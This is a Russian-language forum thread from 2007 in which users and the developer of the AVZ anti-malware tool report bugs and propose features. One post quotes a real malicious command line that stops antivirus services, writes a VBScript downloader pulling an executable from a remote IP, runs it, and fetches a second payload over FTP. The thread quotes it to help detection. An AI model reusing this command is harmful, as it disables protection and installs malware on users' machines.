15.12.2007, 18:25
Создай командный файл CMEРТ_OT_CMEXA.CMD.
Впиши туда одну строчку - avz.exe lang=ru
Ну и запускай его вместо AVZ

Олег, может имеет смысл добавить avz_ru.cmd и avz_en.cmd прями в архив с программой, чтобы пользователи не мучались?

NickGolovko
15.12.2007, 18:36
Мотивируют тем, что в ряде случаев им достаточно запросить лог одного диспетчера и не прогонять полностью все исследование системы. Я, кстати, тоже иногда прошу лог конкретного менеджера. :)

Макcим
15.12.2007, 23:05
Кажется мой вопрос остался без ответа :unsure: Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?

Xen
15.12.2007, 23:58
Проявилась еще одна проблема, Win XP Home SP2 Rus:



9. Мастер поиска и устранения проблем
>> Нарушение ассоциации REG файлов


Ассоциация с виду в порядке, если надо, могу скинуть соответствующие ветки реестра.

И два предложения:

1. Писать в программе полную версию билда, а не просто 4.29
2. Распространять дистрибутив через торренты, если агава не справляется. Все же лучше, чем рапидшара =)

Зайцев Олег
16.12.2007, 00:00
Кажется мой вопрос остался без ответа :unsure: Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?
Не запрещено, а не разрешено. Если перед выполнением скриптов это разрешить в настройке, то они удаляться. Так было исторически, руткит относится к категории HackTool (равно как эксплоиты, hacktools и т.п.)

Макcим
16.12.2007, 00:04
2. Распространять дистрибутив через торренты, если агава не справляется. Все же лучше, чем рапидшара =)Можно сделать зеркало у нас.

Добавлено через 2 минуты


Не запрещено, а не разрешено. Если перед выполнением скриптов это разрешить в настройке, то они удаляться. Так было исторически, руткит относится к категории HackTool (равно как эксплоиты, hacktools и т.п.)Может забыть историю и перенести руткиты в другую категорию? Жалко хелперов, зачем вручную удалять то, что AVZ не плохо почистит сам на автоматике во время сбора логов?

Xen
16.12.2007, 00:08
3. Не во всех менеджерах возможно скопировать в карантин.

santy
17.12.2007, 07:56
...В исследовании системы можно генерировать лог с любым набором данных, сохранение протокола из каждого менеджера - это пережиток старых версий, где не было исследования системы.

Олег, реально с помощью АВЗ получить исследование удаленной системы? Выполнить анализ лога исследования и автоматически сгенерировать скрипт выполнения, который можно интерактивно поправить... т.е. иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.

Jef239
17.12.2007, 08:05
иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.
Опосля чего остальные антивирусы запишут AVZ в зловреды? :smile:
Гм, возможности AVZ настолько широки, что очень не хотелось бы, чтобы кто-то мог удалённо управлять моей машиной.
Так что если делать - то по специальному ключу и так далее.

santy
17.12.2007, 09:29
Опосля чего остальные антивирусы запишут AVZ в зловреды? :smile:
Гм, возможности AVZ настолько широки, что очень не хотелось бы, чтобы кто-то мог удалённо управлять моей машиной.
Так что если делать - то по специальному ключу и так далее.

Так все равно это делает юзер с помощью Gain&Abel, Ideal Administration, DameWare Utilities - правда, с админскими правами на удаленной системе.

Jef239
17.12.2007, 09:59
Так все равно это делает юзер с помощью Gain&Abel, Ideal Administration, DameWare Utilities - правда, с админскими правами на удаленной системе.
Или хакер при помощи какого-нибудь трояна вроде BackOffice.
Фишка в том, что лично я иметь AVZ на своей машине хочу. А потенциальную дырку для хакера - как-то не хочется. Я лучше имеющиеся в виндах дырки прикрою.
А клиенту админские права на удалённой машине ОБЯЗАТЕЛЬНО должны быть нужны. Даже если это корпоративная сеть без инета. Иначе - НЕБЕЗОПАСНО. Уж слишком много опасного умеет делать AVZ.

Зайцев Олег
17.12.2007, 10:30
Олег, реально с помощью АВЗ получить исследование удаленной системы? Выполнить анализ лога исследования и автоматически сгенерировать скрипт выполнения, который можно интерактивно поправить... т.е. иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.
Технически я могу конечно ввести в AVZ некую фичу типа RAdmin, которая даст доступ к экрану и клавиатуре/мышке. Если рассуждать чисто гипотетически, то в случае введения этой опции она будет активироваться через меню, функционировать только на сеанс и только пока запущен AVZ, причем для активации нужно будет задавать IP "помошника", его логин, пароль. С другой стороны, сколь актуальна подобная фича ? Ее плюс конечно несомненен - хелпер в сложной ситуации сможет напрямую подключиться к ПК для лечения, минус также несомненен - по сути это "дырка" в безопасности, пусть небольшая, но дырка.
Другой путь решения - это удаленный запуск AVZ с применением скрипта, который изучит систему и пошлет логи куда сказано. Там их изучат, и будет выполнен удаленный запуск AVZ с выполнением скрипта карантина и лечения. По сути идея идентична разделу "Помогите", но с автоматическим запуском - такое применяется у меня в конторе на всех ПК.
Наконец третий вариант самый правильный - это хелпдеск, связанный с ядром AVZ. Т.е. ядро изучает систему, шлет данные хелпдеску (автоматом, через почту при помощи юзера и т.п.). Хелпдеск изучает их с помощью ИР, формирует скрипт (правильный по его мнению) и подключает хелпера. Хелпер изучает предложение ИР, вносит в случае надобности корректуры, далее скрипт идет юзеру, результат - хелпдеску и т.п. по кругу. В данном случае плюс в том, что явного удаленного управления нет, юзер может изучить скрипты и отсылаемые логи, и обмен идет не с ПК некого хелпера (который юзеру в принципе неизвестен), а с хелпдеском, размещенным у уважаемого AV вендора, выступающего в данном случае гарантом безопасности всей этой цепочки. В этой ситуации хелпдеск будет еще и защитой от "хелпера-терориста", так как блокирует явные ошибки в скриптах типа удаления легитимного ПО.

drongo
17.12.2007, 11:01
Я за третий вариант ;)

santy
17.12.2007, 13:38
Был бы интересен такой вариант: (естественно, без удаленного управления.... потому что админ по любому сможет в лок.сети подключиться к удаленной системе и запустить АВЗ с общедоступного ресурса). админ, запускает АВЗ на СВОЕЙ машине, запускает процесс исследования на удаленной машине, получает вывод в таблицы_окна, аналогично как мы видим СВОИ процессы, службы, драйвера, автозагрузку и т.д. в менеджерах сервиса с полным анализом процессов, служб, драйверов по базе безопасных файлов АВЗ. Но, соответственно, без (а может с такой возможностью!!!) возможности kill process, добавить в карантин и т.д.. Далее, после просмотра таблицы данных админом запускается анализ и автоматическая генерация скрипта, если необходимо его выполнение.... Т.е. интересно было бы не автоматическое и периодическое сканирование системы - а, тогда, когда в этом есть необходимость, по каким то признакам заражения....

maXmo
17.12.2007, 15:01
1) Просмотр родителя процесса. (смотрел утилитой pslist от Русиновича)может process explorer того же Руссиновича.


2) Просмотр командной строки, с которой запущен процесс.может, пути к исполняемому файлу? Тоже может procexp. А всю командную строку получить будет затруднительно, да и незачем.

Зайцев Олег
17.12.2007, 16:47
может process explorer того же Руссиновича.

может, пути к исполняемому файлу? Тоже может procexp. А всю командную строку получить будет затруднительно, да и незачем.
AVZ в исследовании системы показывает командную строку запущенных процессов (в крайней правой колонке, в качестве примечания).
А вот отображение родительского процесса стоит сделать, это несложно

Jef239
17.12.2007, 19:17
Был бы интересен такой вариант:
Олег, до меня кажется дошло, что он принципиально нового хочет. Грубо говоря - вычитку XML-логов в формы AVZ. Желательно - с генерацией скрипта по нажатиям кнопок в формах AVZ. Остальное - технические детали пересылки, её можно пока и почтой делать.

Насколько это реально?

Добавлено через 56 минут


AVZ в исследовании системы показывает командную строку запущенных процессов (в крайней правой колонке, в качестве примечания).
Гм, а антивирусный поиск в ней сложно сделать? Я про случай, когда когда законный CMD.EXE выполняет вирусный код. В принципе AVZ может сам отловить это.


А вот отображение родительского процесса стоит сделать, это несложно
СПАСИБО!

А вот и командная строчка
F:\WINNT\system32\cmd.exe /c net stop "Norton AntiVirus Auto Protect Service"&net stop Mcshield&net stop "Panda Antivirus"&echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.vbs&echo ExeURL = "http://91.122.0.103:2904/84785_mssql.exe">>c:\1.vbs&echo LocalPath = "c:\windmns.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.>>c:\1.vbs&echo Const adTypeBinary = ^1>>c:\1.vbs&echo Const adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type = adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath, adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.vbs&start c:\windmns.exe&echo OPEN 91.122.0.103 16467>x&echo GET 27031_mssql.exe>>x&echo QUIT>>x&FTP -n -s:x&27031_mssql.exe&del x&exit

NickGolovko
17.12.2007, 20:55
Олег,

посмотрите, пожалуйста, на строку Автозапуска в протоколе, которая гласит

C:\WINDOWS\S

HJT показывает на ее месте

O4 - HKCU\..\Run: [Gpn] C:\WINDOWS\S?mantec\msdtc.exe

Из-за этого я забыл этот файл в скрипте пользователю. :) Подозреваю, что подобное бывало и ранее, но спрашиваю: фиксабельно? :)

Jef239
18.12.2007, 00:20
Олег, а почему для процесса номер 8 показывается файл \WINNT\System? Более того, он запихивается в картантин, что явно не порядок.
8 - это idle process, он с файлом не связан. Так что - всегда зелёное исключение должно быть.

zerocorporated
18.12.2007, 09:07
Косяк нашёл в avz: В диспетчере процессов если как показано на рисунку взять и перетащить разделение 2 таблиц само вверх, то нижняя таблица под верхнюю залазит что элементов управления нижней не видно.

aintrust
18.12.2007, 09:12
@ Jef239

Это что-то новенькое... =)

Процесс с PID 8 под Windows 2k (речь идет о ней, насколько я понял) - это System, а не System Idle Process (этот псевдо-процесс всегда имеет PID 0). Насчет черного цвета для процесса System - да, непорядок, неплохо бы это поправить, чтобы не сбивать с толку.

Только вот с карантином непонятно... Что у вас туда попало, какой именно файл?

@ zerocorporated

У меня такого эффекта не наблюдается, все отображается абсолютно корректно...

PS. "Спасибо" случайно нажал, рука дрогнула... Надеюсь, вы не в обиде? =) Пусть это "спасибо" будет просто за ваши заслуги в разделе "Помогите!", ОК?

Зайцев Олег
18.12.2007, 09:30
@ Jef239

Это что-то новенькое... =)

Процесс с PID 8 под Windows 2k (речь идет о ней, насколько я понял) - это System, а не System Idle Process (этот псевдо-процесс всегда имеет PID 0). Насчет черного цвета для процесса System - да, непорядок, неплохо бы это поправить, чтобы не сбивать с толку.

Только вот с карантином непонятно... Что у вас туда попало, какой именно файл?

@ zerocorporated

У меня такого эффекта не наблюдается, все отображается абсолютно корректно...

PS. "Спасибо" случайно нажал, рука дрогнула... Надеюсь, вы не в обиде? =) Пусть это "спасибо" будет просто за ваши заслуги в разделе "Помогите!", ОК?

Я знаю про карантин System, это мелкий баг ... Там все просто, AVZ не находит файл, и обращается к системе прямого чтения диска с запросом - и система читает ему кусок с диска, обычно это собсвенно содержимое папки с таким именем.

NickGolovko
18.12.2007, 11:47
А мой вопрос на предыдущей странице? :)

Зайцев Олег
18.12.2007, 11:58
Олег,

посмотрите, пожалуйста, на строку Автозапуска в протоколе, которая гласит

C:\WINDOWS\S

HJT показывает на ее месте

O4 - HKCU\..\Run: [Gpn] C:\WINDOWS\S?mantec\msdtc.exe

Из-за этого я забыл этот файл в скрипте пользователю. :) Подозреваю, что подобное бывало и ранее, но спрашиваю: фиксабельно? :)
На месте знака ? стоит какой-то непечатный символ, который AVZ воспринял как разделитель. В теории это можно поймать, я думаю как

aintrust
18.12.2007, 11:59
AVZ не находит файл, и обращается к системе прямого чтения диска с запросом - и система читает ему кусок с диска, обычно это собсвенно содержимое папки с таким именем.
Однако! =)

Bratez
18.12.2007, 16:03
Олег, посмотрите пожалуйста логи в этом сообщении:
http://virusinfo.info/showpost.php?p=162129&postcount=6
Чем объяснить, что в логе HJT видно:

O20 - Winlogon Notify: ovrscn - C:\WINDOWS\SYSTEM32\ovrscn.dll
а в AVZ - нет?

aintrust
18.12.2007, 16:10
А файл этот есть на диске?

Макcим
18.12.2007, 17:02
Есть запись в реестре, которую нужно показать в любом случае.

Зайцев Олег
18.12.2007, 19:14
Есть запись в реестре, которую нужно показать в любом случае.
Возможна ситуация, что файл чистый - тогда запись подавится

Макcим
18.12.2007, 20:53
Да не похоже ;( http://virusinfo.info/showthread.php?t=12651

Romero
18.12.2007, 23:44
объясните пожалуйста обозначение результата сканирования
вот цитирую часть лога



Анализ kernel32.dll, таблица экспорта найдена в секции .text
Функция kernel32.dll:CopyFileA (62) перехвачена, метод ProcAddressHijack.GetProcAddress ->77E711B9->77ED6D7B
Перехватчик kernel32.dll:CopyFileA (62) нейтрализован
Функция kernel32.dll:CopyFileExA (63) перехвачена, метод ProcAddressHijack.GetProcAddress ->77EB1E41->77ED6D8A

Перехватчик kernel32.dll:CreateProcessW (100) нейтрализован
Функция kernel32.dll:DeleteFileA (125) перехвачена, метод ProcAddressHijack.GetProcAddress ->77E7177A->77ED6DB7
Перехватчик kernel32.dll:DeleteFileA (125) нейтрализован
Функция kernel32.dll:DeleteFileW (126) перехвачена, метод ProcAddressHijack.GetProcAddress ->77E71660->77ED6F1F

Перехватчик kernel32.dll:MoveFileW (602) нейтрализован
Функция kernel32.dll:OpenFile (615) перехвачена, метод ProcAddressHijack.GetProcAddress ->77E72B38->77ED6D4E
Перехватчик kernel32.dll:OpenFile (615) нейтрализован

>>> Внимание, таблица KiST перемещена ! (804FBCA0(284)->E18E3758(297))
Функция NtConnectPort (1F) перехвачена (8057FED0->F2A710D2), перехватчик D:\WINDOWS\System32\DRIVERS\cmdmon.sys, драйвер опознан как безопасный
Функция NtCreateFile (25) перехвачена (80556B0E->F2A73302), перехватчик D:\WINDOWS\System32\DRIVERS\cmdmon.sys, драйвер опознан как безопасный
Функция NtCreatePort (2E) перехвачена (805809A6->F2A7102C), перехватчик

D:\WINDOWS\System32\DRIVERS\cmdmon.sys, драйвер опознан как безопасный
Функция NtQueryInformationFile (97) перехвачена (8055841A->F29A627A), перехватчик D:\WINDOWS\System32\Drivers\klif.sys, драйвер опознан как безопасный
Функция NtSetContextThread (D5) перехвачена (805AB91E->F2A70BB4), перехватчик


я так и не понял, программа обнаружила Руткит или нет?

rubin
18.12.2007, 23:49
В ходе сканирования программа снимает хуки и следит за перехватами.

Тут у Вас перехват от cmdmon.sys, но читаем дальше:

Функция NtConnectPort (1F) перехвачена (8057FED0->F2A710D2), перехватчик D:\WINDOWS\System32\DRIVERS\cmdmon.sys, драйвер опознан как безопасный
Т.е. это не руткит.
Конкретно тут - cmdmon.sys от Comodo Firewall, klif.sys - от Антивируса Касперского

Jef239
19.12.2007, 00:18
@ Jef239
Процесс с PID 8 под Windows 2k (речь идет о ней, насколько я понял) - это System, а не System Idle Process (этот псевдо-процесс всегда имеет PID 0).

Угу, описался.


Только вот с карантином непонятно... Что у вас туда попало, какой именно файл?

О!!!!!!!!!! Полюбуйся!!!!!!!!!!!!!!!! ROTFL! Да, фактическая длина dta -8192 байта. А ты разве не тестер, что не заметил такое чудо?


Ошибка карантина файла, попытка прямого чтения (F:\WINNT\System)
Карантин с использованием прямого чтения - ОК
Файл успешно помещен в карантин (F:\WINNT\System)



[InfectedFile]
Src=F:\WINNT\System
Infected=avz00104.dta
Virus=Скопирован автоматически из диспетчера процессов
QDate=19.12.2007 0:11:38
Size=0
MD5=EF8BE0A44DDA0FBFEC365549DE09BA97

Jef239
19.12.2007, 00:37
@ zerocorporated

У меня такого эффекта не наблюдается, все отображается абсолютно корректно...

Или у тебя в XP иначе, или ты не понял как смотреть. Передвигаешь сплитер вверх, за границу Constraints.MinHeight. Отпускаешь сплитер. Он уставливается по MinHeight. И видишь описанный эффект.
Кроме того, что описано, не виден сплитер.
http://virusinfo.info/attachment.php?attachmentid=25646&stc=1&d=1198013816


Для визуального пропадания эффекта нужно сделать rearrange, например, путём максимизации или нормализации окна.

Bratez
19.12.2007, 09:34
Команда DeleteService не работает,
не только для активного, но и для отключенного сервиса/драйвера!

Подозрение возникло после использования в двух-трех темах в "Помогите". Провел эксперимент на собственном компьютере и убедился - не работает :(.

santy
19.12.2007, 14:16
Другой путь решения - это удаленный запуск AVZ с применением скрипта, который изучит систему и пошлет логи куда сказано. Там их изучат, и будет выполнен удаленный запуск AVZ с выполнением скрипта карантина и лечения. По сути идея идентична разделу "Помогите", но с автоматическим запуском - такое применяется у меня в конторе на всех ПК.


этот вариант, действительно можно реализовать, использую планировщик заданий, либо системный, либо встроенный в антивирусные программы... тем более, что через консоль управления (Enterprise Edition) можно любому компьютеру поставить задание удаленного запуска AVZ с получением лога исследования и с выполнением уже готового скрипта лечения.


Наконец третий вариант самый правильный - это хелпдеск, связанный с ядром AVZ. Т.е. ядро изучает систему, шлет данные хелпдеску (автоматом, через почту при помощи юзера и т.п.). Хелпдеск изучает их с помощью ИР, формирует скрипт (правильный по его мнению) и подключает хелпера. Хелпер изучает предложение ИР, вносит в случае надобности корректуры, далее скрипт идет юзеру, результат - хелпдеску и т.п. по кругу. В данном случае плюс в том, что явного удаленного управления нет, юзер может изучить скрипты и отсылаемые логи, и обмен идет не с ПК некого хелпера (который юзеру в принципе неизвестен), а с хелпдеском, размещенным у уважаемого AV вендора, выступающего в данном случае гарантом безопасности всей этой цепочки. В этой ситуации хелпдеск будет еще и защитой от "хелпера-терориста", так как блокирует явные ошибки в скриптах типа удаления легитимного ПО.

ИР??? Олег, а почему не встроить уже сейчас анализатор логов в редактор скриптов, например? А редактор скриптов включить бы в меню АВЗ. Как-то выпадает из поля зрения. Там ведь многое уже автоматизировано.... Тогда анализатор прошел бы хорошее тестирование... можно визуально видеть лог, и сопоставить его с генерируемым скриптом... а на сервере... конечно... логи складываются в базу данных и анализатор работает с вновь прибывающими в базу записями. Это хорошее решение.

Bratez
19.12.2007, 17:07
Меня всегда очень удивляет, почему вот эта, набившая оскомину служба:

O23 - Service: FCI - Unknown owner - C:\WINDOWS\system32\svchost.exe:ext.exe (file missing)
никогда не отображается в логе AVZ - ни в прежних версиях, ни в новой?
Свежий пример тут:
http://virusinfo.info/showthread.php?t=15469

Зайцев Олег
19.12.2007, 17:30
Меня всегда очень удивляет, почему вот эта, набившая оскомину служба:

O23 - Service: FCI - Unknown owner - C:\WINDOWS\system32\svchost.exe:ext.exe (file missing)
никогда не отображается в логе AVZ - ни в прежних версиях, ни в новой?
Свежий пример тут:
http://virusinfo.info/showthread.php?t=15469
Если служба реально существует, и у нее задан реальный тип автозапуска, то AVZ ее покажет. И файл покажет ... в виде:
с:\windows\system32\svchost.exe:ext.exe:$DATA >>> Опасно - исполняемый файл в потоке NTFS - возможно, маскировка исполняемого файла

А вот хвост в реестре, тем более при отсутствии файла, AVZ не покажет

Добавлено через 6 минут


ИР??? Олег, а почему не встроить уже сейчас анализатор логов в редактор скриптов, например? А редактор скриптов включить бы в меню АВЗ. Как-то выпадает из поля зрения. Там ведь многое уже автоматизировано.... Тогда анализатор прошел бы хорошее тестирование... можно визуально видеть лог, и сопоставить его с генерируемым скриптом... а на сервере... конечно... логи складываются в базу данных и анализатор работает с вновь прибывающими в базу записями. Это хорошее решение.
А все дело в том, что для анализатора нужна стационарная база + много чего еще, это очень громоздакая технология. Очень мощная, но очень громоздкая. Под нее мощный сервак нужен, база и прочее

Добавлено через 2 минуты


Команда DeleteService не работает,
не только для активного, но и для отключенного сервиса/драйвера!

Подозрение возникло после использования в двух-трех темах в "Помогите". Провел эксперимент на собственном компьютере и убедился - не работает :(.
Да, баг подтверждаю, он появился в 4.29. Сейчас исправлю, апдейт будет сегодня-завтра (перевод уже выверен, остальные баги закрыты)

Макcим
19.12.2007, 17:37
Да, баг подтверждаю, он появился в 4.29. Сейчас исправлю, апдейт будет сегодня-завтра (перевод уже выверен, остальные баги закрыты)Добавьте кнопочку "Карантин через BC". Очень прошу...

Geser
19.12.2007, 17:37
А вот хвост в реестре, тем более при отсутствии файла, AVZ не покажет



Я с этим категорически не согласен. Это огромная дыра в АВЗ сквозь которую проходят и будут проходить руткиты. Показано должно всё что есть в реестре, не зависимо от параметров запуска и наличия файла на диске.

Ego1st
19.12.2007, 17:43
Согласен с Geser, давно уже хотел об этом сказать, информация о системе небывает лишней..

Макcим
19.12.2007, 18:06
Поддерживаю.

pig
19.12.2007, 19:32
Присоединяюсь. Такие штуки надо показывать:
- либо это активный зловред, которого надо мочить
- либо это мусор, который надо убирать

XL
19.12.2007, 22:29
Кстати, мое сообщение в теме о версии 4.27 относительно данного зеленого сервиса (ICF = svchost.exe:exe.exe) в логе диспетчера сервисов так и осталось без ответа. Ведь служба показывается зеленым в диспетчере служб, а значит считается безопасной! Поэтому и в отчет исследования системы не попадает...

drongo
20.12.2007, 00:30
Для удобства : для раздела автозапуска в логе добавить также кнопочки удаления ;)

Ego1st
20.12.2007, 02:30
Кстати, мое сообщение в теме о версии 4.27 относительно данного зеленого сервиса (ICF = svchost.exe:exe.exe) в логе диспетчера сервисов так и осталось без ответа. Ведь служба показывается зеленым в диспетчере служб, а значит считается безопасной! Поэтому и в отчет исследования системы не попадает...

угу я писал об этом, тоже..

NickGolovko
20.12.2007, 10:15
Я с этим категорически не согласен. Это огромная дыра в АВЗ сквозь которую проходят и будут проходить руткиты. Показано должно всё что есть в реестре, не зависимо от параметров запуска и наличия файла на диске.

Я видел несколько раз в отчетах хвосты из реестра. Файла нет, запись есть.

Добавлено через 6 минут


Кстати, мое сообщение в теме о версии 4.27 относительно данного зеленого сервиса (ICF = svchost.exe:exe.exe) в логе диспетчера сервисов так и осталось без ответа. Ведь служба показывается зеленым в диспетчере служб, а значит считается безопасной! Поэтому и в отчет исследования системы не попадает...

Как я понимаю, AVZ смотрит на исполняемый файл svchost.exe, а не на файл в его потоке.

drongo
20.12.2007, 15:01
записи зловредов надо удалять даже если файла самого нет. Если уж взляли на себя лозунг :" за чистый интернет" - надо соблюдать ;)
кстати о том что не хватает в avz , а есть в hijackthis.
в hijackthis есть строчки с 012 ( плагины експлорера , если не ошибаюсь)нет этого в логе AVZ . Вот явное доказательство :
C:\Programme\Internet Explorer\Plugins\NPUPano.dll нет упоминания данного файла в логах AVZ.
http://virusinfo.info/showthread.php?p=162933#post162933

zerocorporated
20.12.2007, 15:17
Вот что за глюк нашёл: При устранение проблемы "Отключить кэширование данных, полученных по защищенному протоколу" Создаётся ключ:

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre nt Version\Internet Settings
DWord DisableCachingOfSSLPages = 1

Тут опечатка как мне кажется в слове Current Version лишний пробел!

XL
20.12.2007, 15:24
Как я понимаю, AVZ смотрит на исполняемый файл svchost.exe, а не на файл в его потоке.

Угу, похоже что так. Значит, надо научить avz еще и stream'ы проверять в таком случае...

Макcим
20.12.2007, 16:45
Есть подозрение, что команда DelCLSID тоже не работает...

rubin
20.12.2007, 16:56
Хм, я в какой-то из тем применял - работало

Макcим
20.12.2007, 17:01
В том то и дело, что работает через раз.

Bratez
20.12.2007, 17:22
Есть подозрение, что команда DelCLSID тоже не работает...
Аналогично.
Вот DelBHO точно работает, и это радует :biggrin:.

Зайцев Олег
20.12.2007, 17:24
В том то и дело, что работает через раз.
Не через раз, а с точной математичсекой закономерностью. Это уже пофиксено. Релиз - в субботу. Можно было бы и сегодня, но я хочу с ADS и битыми службами решить вопрос, чтобы релизы не плодить

Макcим
20.12.2007, 17:29
Не через раз, а с точной математической закономерностью. Это уже пофиксено.Извините, не хотел обидеть. За релиз спасибо.

Geser
20.12.2007, 19:29
http://virusinfo.info/showpost.php?p=163059&postcount=6
Это пару раз уже видел. Отловлен баг?

Зайцев Олег
20.12.2007, 21:27
http://virusinfo.info/showpost.php?p=163059&postcount=6
Это пару раз уже видел. Отловлен баг?
Нет. Он возникает на W2K SP4, я ловлю его

UFANych
20.12.2007, 22:26
А вот старый вопрос (я уже его поднимал) - на консоли W2k с работающим сервером терминалов AVZ некоторые пути указывает совсем не в тему.
В частности,
1. При работе на консоли, если пользователю средствами AD задан домашний диск (см. рис. 1), то и в диспетчере процессов AVZ, и во многих других местах вместо правильного пути c:\windows\blala указывается p:\windows\blabla
2. При работе в терминальной сессии тоже часть путей показывается неправильно. Иллюстрация - рис. 2 - вообще уникально - AVZ сумел исказить путь из ярлыка! Там то чего искать? :wink_3:
Хотя, покопавшись, нашёл вот что - если свойства ярлыка открыть через плагин EMenu к FARу, то путь действительно такой, как показывает AVZ, то есть как на рис.3 (from_far.png). Если же этот ярлык найти в меню и узнать его свойства там, то получаем рис.4 (from_menu.png)
Вот такой блин терминал. Соответственно, как то трудновато использовать AVZ там.
:sad:

Jef239
21.12.2007, 02:24
Нет. Он возникает на W2K SP4, я ловлю его
Олег, хочешь я под дельфийским отладчиком посмотрю в чём там дело?

drongo
21.12.2007, 15:42
Олег, у тебя наверное л.с. забит, поэтому пишу тут :
Насчёт ближайшего релиза -
Не забудь пожалуйста обновить исправления в английской части программы и хепл английский включить в зип, тзкже чтобы автоматом выбирался английский хелп , когда в английском интерфейсе запускаеться программа ;)

Зайцев Олег
21.12.2007, 16:04
Олег, хочешь я под дельфийским отладчиком посмотрю в чём там дело?
Отладчик даст место (я его и так знаю), но не причну - поэтому не стоит терять времени. Гораздо интереснее другое - тест на чистом W2K, чтобы понять, это проблема AVZ + W2K или AVZ + W2K + Outpost

NickGolovko
21.12.2007, 19:16
Олег, у тебя наверное л.с. забит, поэтому пишу тут :
Насчёт ближайшего релиза -
Не забудь пожалуйста обновить исправления в английской части программы и хепл английский включить в зип, тзкже чтобы автоматом выбирался английский хелп , когда в английском интерфейсе запускаеться программа ;)

+1

:)

Биомеханик
21.12.2007, 22:57
А принципиально нового в AVZ не планируеться?

zerocorporated
22.12.2007, 09:05
Так как смотрю что вредоносные программы часто помешают себя в некоторые каталоги, может в отчете avz показывать список потенциально опасных файлов в директориях в которых они по идее не должны находится например(Все без подкаталогов):


Тут искать *.exe *.dll *.sys *.com *.pif *.bat *.cmd *.vbs *.js *.ocx
C:\WINDOWS\Temp
C:\Documents and Settings\%username%\Local Settings\Temp
C:\WINDOWS\Downloaded Program Files
C:\Documents and Settings\%username%\Local Settings\Temporary Internet Files
C:\Program Files
C:\Documents and Settings\All Users\Application Data

Исключить *.sys
C:\WINDOWS\system32\drivers

Исключить *.dll
C:\WINDOWS\system



Искать только *.sys
C:\WINDOWS\system32
C:\WINDOWS

Искать только *.exe *.dll *.vbs *.js *.ocx
C:\


Правда размер лога может вырасти...

Jef239
22.12.2007, 16:09
Гораздо интереснее другое - тест на чистом W2K, чтобы понять, это проблема AVZ + W2K или AVZ + W2K + Outpost

При остановленном Outpost (и EXE и сервис) эффект тот же. Выгрузить ещё и драйвера?

AndreyKa
22.12.2007, 23:52
В теме http://virusinfo.info/showthread.php?t=15556
странные пути у файлов в секции "Модули пространства ядра". С переменной
%SystemRoot% все в прорядке. Может ли это быть вызвано нестандартным именем папки для установки Windows (C:\WINDOWS.1)?

pig
23.12.2007, 03:03
При остановленном Outpost (и EXE и сервис) эффект тот же. Выгрузить ещё и драйвера?
Обязательно. Драйвера как раз самые подозреваемые и есть.

Jef239
23.12.2007, 04:16
Обязательно. Драйвера как раз самые подозреваемые и есть.
Анинсталировал Outpost вообще. Запустил AVZ - баг на месте. То есть это вообще не OutPost виноват. А именно SP4. Какие дальше эксперименты делать?

Олег, может быть ты скажешь, где взять текст стандартного скрипта номер 2, а я посмотрю, на какой команде (группе команд) этого скрипта лажает? Да, почти наверняка оно валится на VarClear. Возможно потому, что в вариантной переменной юникодная строка (или мусор). Если ОЧЕНЬ надо - могу под отладчиком посмотреть, где оно всё-таки падает. Но мне будет легче смотреть, если будет известна одна операция скрипта, а не ждать пока весь скрипт пройдёт.

Ещё вариант - можешь обвещшать все вариантные операции отладочной инофрмацией, а я запущу у себя и пришлю трассу.

P.S. У меня фактически preSP5 стоит. То есть все последние патчи + выходивший где-то год назад preSP5.

XL
23.12.2007, 14:29
Да, и еще мои 5 рублей по поводу нововведений в 4.29
Есть основания говорить, что в подозрительные объекты в отчете исследования системы попадает не все. Например, драйверы с цифровой подписью, которые ничего не перехватывают, но при этом загружены в память и являются явными зловредами:

C:\WINDOWS\System32\Drivers\ndisrd.sys NDISRD helper driver Copyright NT Kernel Resources© 2002-2003
Хотя, если подумать, то автоматику тут использовать почти невозможно. Если только она сама гуглить не станет по именам файлов...
Прикрепил архив с отчетом, который иллюстрирует ситуацию.
Очевидно, как раз для таких случаев и потребуется helpdesk...

Geser
23.12.2007, 17:10
У меня 2 предложения по АВЗ.
1. Иногда трояны подменяют собой системные файлы, и при их удалении система не поднимается. Думаю стоит добавить в АВЗ базу данных имён системных файлов (включая полный путь, конечно) и помечать такие файлы в логе. Так хелперы смогут понять что нельзя просто удалять файл, а нужно его заменить на чистый.
Если это проблемно с точки зрения объёма базы, то хотя бы писать в неё файлы которые наиболее часто подменяются троянами.
2. Иногда системные файлы не изменяются, а просто в реестре изменяется ссылка, на файл трояна. Опять же, в случае удаления система не поднимится. Предлагаю так же добавить базу данных ключей изменяемых троянами, и выдавать предупреждения в случае если они ссылаются на файлы отличные от стандартных.

Зайцев Олег
23.12.2007, 19:41
У меня 2 предложения по АВЗ.
1. Иногда трояны подменяют собой системные файлы, и при их удалении система не поднимается. Думаю стоит добавить в АВЗ базу данных имён системных файлов (включая полный путь, конечно) и помечать такие файлы в логе. Так хелперы смогут понять что нельзя просто удалять файл, а нужно его заменить на чистый.
Если это проблемно с точки зрения объёма базы, то хотя бы писать в неё файлы которые наиболее часто подменяются троянами.
